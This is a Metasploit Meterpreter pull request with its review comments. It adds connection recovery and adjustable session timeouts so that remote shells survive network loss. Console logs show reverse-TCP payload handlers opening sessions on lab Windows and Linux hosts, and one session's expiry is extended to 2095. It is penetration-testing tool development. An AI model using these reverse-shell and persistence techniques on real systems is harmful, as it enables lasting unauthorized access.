search

rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD
Other
326 stars 144 forks source link

Connection recovery and POSIX transport switching #151

Closed OJ closed 9 years ago

OJ commented 9 years ago

This PR contains a stack of code that is another stepping stone towards totally resilient and stable shells. The goal of this work is to allow Meterpreter to "recover" communications in the event of network failures or disconnects.

All of the HTTP related timeouts are now available in TCP comms too (session expiry, comms timeout, retry total and retry wait). These can all be set/get on the fly as well so that the tester/attacker has fully control. This also means that session expiry can be extended (which we weren't able to do before).

The code includes:

To be clear, the word "recovery" in this case means "restarting communications in the way it was done previously". That means it'll callback again if it's reverse, or it'll bind again if it's bind. If https is required, that's what it it'll be.

This work relies on new bind stagers which are still WIP in the MSF repo. The MSF side of this PR can be found here: https://github.com/rapid7/metasploit-framework/pull/5214

In essence you should be able to kill off comms (or MSF totally). Restart MSF, and have things "just work".

NOTE: This change means that TCP payloads behave like HTTP in that calling exit -y no longer kills off communications. If you want sessions to die, you have to tell them! (or wait for them to expire).

POSIX has an issue where the timeouts can't be patched by MSF on the fly because the strings that are used for replacement aren't visible due to gzip compression. This is something I'll be getting help from Brent on. For now they have "sane defaults" and they can be modified on the fly.

Keen eyes and critique needed.

Sample run:

Windows x64:

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (1124864 bytes) to 10.1.10.35
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.35:49285) at 2015-04-21 20:06:06 +1000

meterpreter > background
msf exploit(handler) > exit -y
$ ./msfconsole -x 'set payload windows/x64/meterpreter_reverse_tcp; run'
[*] Starting the Metasploit Framework console...|
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

       =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
+ -- --=[ 1445 exploits - 822 auxiliary - 229 post        ]
+ -- --=[ 378 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/x64/meterpreter_reverse_tcp
[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.35:49286) at 2015-04-21 20:08:14 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > exit

POSIX:

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1564672 bytes) to 10.1.10.40
[*] Meterpreter session 2 opened (10.1.10.40:8000 -> 10.1.10.40:49080) at 2015-04-21 20:15:57 +1000

meterpreter > sysinfo
Computer     : ropchain
OS           : Linux ropchain 3.19.2-201.fc21.x86_64 #1 SMP Tue Mar 24 03:08:23 UTC 2015 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > exit -y
$ ./msfconsole
[*] Starting the Metasploit Framework console...|
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.pro

       =[ metasploit v4.11.0-dev [core:4.11.0.pre.dev api:1.0.0]]
+ -- --=[ 1445 exploits - 822 auxiliary - 229 post        ]
+ -- --=[ 378 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1564672 bytes) to 10.1.10.40
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.40:49092) at 2015-04-21 20:16:31 +1000

meterpreter > sysinfo
Computer     : ropchain
OS           : Linux ropchain 3.19.2-201.fc21.x86_64 #1 SMP Tue Mar 24 03:08:23 UTC 2015 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit

Timeout extension:

meterpreter > get_timeouts 
Session Expiry  : @ 2015-05-05 21:25:28
Comm Timeout    : 300 seconds
Retry Total Time: 3600 seconds
Retry Wait Time : 10 seconds
meterpreter > set_timeouts 
Usage: set_timeouts [options]

Set the current timeout options.
Any or all of these can be set at once.

OPTIONS:

    -c <opt>  Comms timeout (seconds)
    -h        Help menu
    -t <opt>  Retry total time (seconds)
    -w <opt>  Retry wait time (seconds)
    -x <opt>  Expiration timout (seconds)

meterpreter > set_timeouts -t 10000
Session Expiry  : @ 2015-05-06 13:49:42
Comm Timeout    : 300 seconds
Retry Total Time: 10000 seconds
Retry Wait Time : 10 seconds
meterpreter > set_timeouts -x 11111111111
Session Expiry  : @ 2095-03-13 03:19:21
Comm Timeout    : 300 seconds
Retry Total Time: 10000 seconds
Retry Wait Time : 10 seconds

Verification

metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/186/ Test PASSED.

bcook-r7 commented 9 years ago

I have a few more things to test, but want to merge this (plus a couple of minor tweaks) so I can test with new bins as well.

OJ commented 9 years ago

Thanks @bcook-r7. I apologise in advance, because the next couple of PRs are probably going to trample on a lot of this stuff.

Hey ho, gotta be done!

OJ commented 9 years ago

Thanks mate.